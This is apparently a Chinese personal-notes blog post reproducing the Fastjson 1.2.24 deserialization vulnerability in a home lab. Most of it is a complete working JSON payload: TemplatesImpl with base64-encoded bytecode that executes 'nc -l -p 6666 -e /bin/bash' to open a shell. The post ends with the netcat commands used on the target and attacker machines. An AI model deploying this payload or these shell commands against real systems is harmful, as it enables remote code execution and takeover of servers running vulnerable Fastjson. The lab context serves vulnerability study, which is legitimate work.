Fastjson1.0漏洞复现

服务器kali linux
攻击机win10
搭建好环境之后,测试漏洞
Fastjson1.0漏洞复现_第1张图片
证明存在漏洞
生成payload
{"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEAGm5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwiLCJfYnl0ZWNvZGVzIjpbIgoAXABhDAAFAGIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAGQBABdjb20uc2VjZnJlZS53d3cuUGF5bG9hZAoAAQBmDAAwADEKAFwAaAwAaQBqAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7CABsAQADIl0sCABuAQAPIl9uYW1lIjoic2hpdCIsCABwAQAPIl90ZmFjdG9yeSI6e30sCAByAQAWIl9vdXRwdXRQcm9wZXJ0aWVzIjp7fQgAdAEAAX0KAFwAdgwAdwBbAQAIdG9TdHJpbmcBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgkAewB9BwB8AQAQamF2YS9sYW5nL1N5c3RlbQwAfgB/AQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07CACBAQBFKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgCDAIUHAIQBABNqYXZhL2lvL1ByaW50U3RyZWFtDACGAGIBAAdwcmludGxuCACIAQBFKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCACKAQBNKiAgICAgICAgICAgICAgICAgIEZhc3Rqc29uIOWPjeW6j+WIl+WMluWPjeW8uSBTaGVsbCDohJrmnKwgICAgICAgICAgICAgICAgICoIAIwBAEUqICAgICAgICAgICAgICAgICAgICAgICAgICB3d3cuc2VjZnJlZS5jb20gICAgICAgICAgICAgICAgICAgICAgICAgICoIAI4BAEYqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKCACQAQA5WypdIFVzYWdlOiBqYXZhIC1qYXIgRmFzdGpzb24tUGF5bG9hZC5qYXIgLS11c2UgMjAxNzAzMTUgCACSAQBpCSAyMDE3MDMxNSA9PiB7W0Zhc3Rqc29uIDw9IDEuMi4yNF0gW2h0dHBzOi8vZ2l0aHViLmNvbS9hbGliYWJhL2Zhc3Rqc29uL3dpa2kvc2VjdXJpdHlfdXBkYXRlXzIwMTcwMzE1XX0KCACUAQAIMjAxNzAzMTUKAJYAmAcAlwEAEGphdmEvbGFuZy9TdHJpbmcMAJkAmgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWggAnAEAKQpbKl0gVXNhZ2U6IFtGYXN0anNvbiBWZXJzaW9uIDw9IDEuMi4yNF0KCACeAQAoWytdIGNvbW1hbmQ6IG5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCggAoAEAGFsqXSBHZW5lcmF0ZSBQYXlsb2FkOgoKCgoAAQCiDABaAFsIAKQBAAIKCggApgEAGlsrXSBTaGVsbDogbmMgYXR0YWNrIDY2NjYKCgCDAKgMAKkAYgEABXByaW50AQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhAQAMSW5uZXJDbGFzc2VzAQAHRW5jb2RlcgAhAAEAAwAAAAAABgABAAUABgABAAcAAAB4AAIAAgAAABYqtwAIuAAKEhC2ABJXpwAITCu2ABaxAAEABAANABAAFwADABsAAAAWAAUAAAAcAAQAHgANAB8AEQAgABUAIgAcAAAAFgACAAAAFgAdAB4AAAARAAQAHwAgAAEAIQAAABAAAv8AEAABBwABAAEHABcEAAEAIgAjAAIAJAAAAAQAAQAlAAcAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAAJAAcAAAAIAADAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACkAKgACAAEAIgArAAIAJAAAAAQAAQAlAAcAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAJwAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACwALQACAAAAAQAuAC8AAwAJADAAMQACACQAAAAIAAMAFwAyADQABwAAAGsAAgAEAAAAF7gANkwrKrYAPE0stgBATrgARi22AEywAAAAAgAbAAAAEgAEAAAAKgAEACsACgAsAA8ALQAcAAAAKgAEAAAAFwBSAFMAAAAEABMAVABVAAEACgANAFYAVwACAA8ACABYAFkAAwAJAFoAWwACACQAAAAIAAMAFwAyADQABwAAAGYAAwAAAAAALrsAXFkSXrcAYBJjuABltgBnEmu2AGcSbbYAZxJvtgBnEnG2AGcSc7YAZ7YAdbAAAAACABsAAAAeAAcAAAAxAAkAMwAWADQAGwA1ACAANgAlADcAKgAxABwAAAACAAAACQB4AHkAAgAkAAAACAADABcAMgA0AAcAAAEDAAQAAQAAAJEqvp0ATrIAehKAtgCCsgB6Eoe2AIKyAHoSibYAgrIAehKHtgCCsgB6Eou2AIKyAHoSh7YAgrIAehKNtgCCsgB6Eo+2AIKyAHoSkbYAgqcAQxKTKgQytgCVmQA4sgB6Epu2AIKyAHoSnbYAgrIAersAXFkSn7cAYLgAobYAZxKjtgBntgB1tgCCsgB6EqW2AKexAAAAAwAbAAAAQgAQAAAAOwAFADwADQA9ABUAPgAdAD8AJQBAAC0AQQA1AEIAPQBDAEUARABNAEUAWwBGAGMARwBrAEgAiABJAJAATwAcAAAADAABAAAAkQCqAKsAAAAhAAAABgAC+wBQPwACAKwAAAACAK0ArgAAAAoAAQBNAEcArwAJ”],"_name":“shit”,"_tfactory":{},"_outputProperties":{}}

Fastjson1.0漏洞复现_第2张图片

然后win10监听

在这里插入图片描述

成功弹回shell.

因为利用的是nc反弹,所以要确保靶机可以执行nc命令
靶机执行:nc -l -p 6666 -e /bin/bash
本机:nc 192.168.80.155(靶机地址) 6666

参考文章:https://www.secfree.com/article/591.html

你可能感兴趣的:(个人笔记)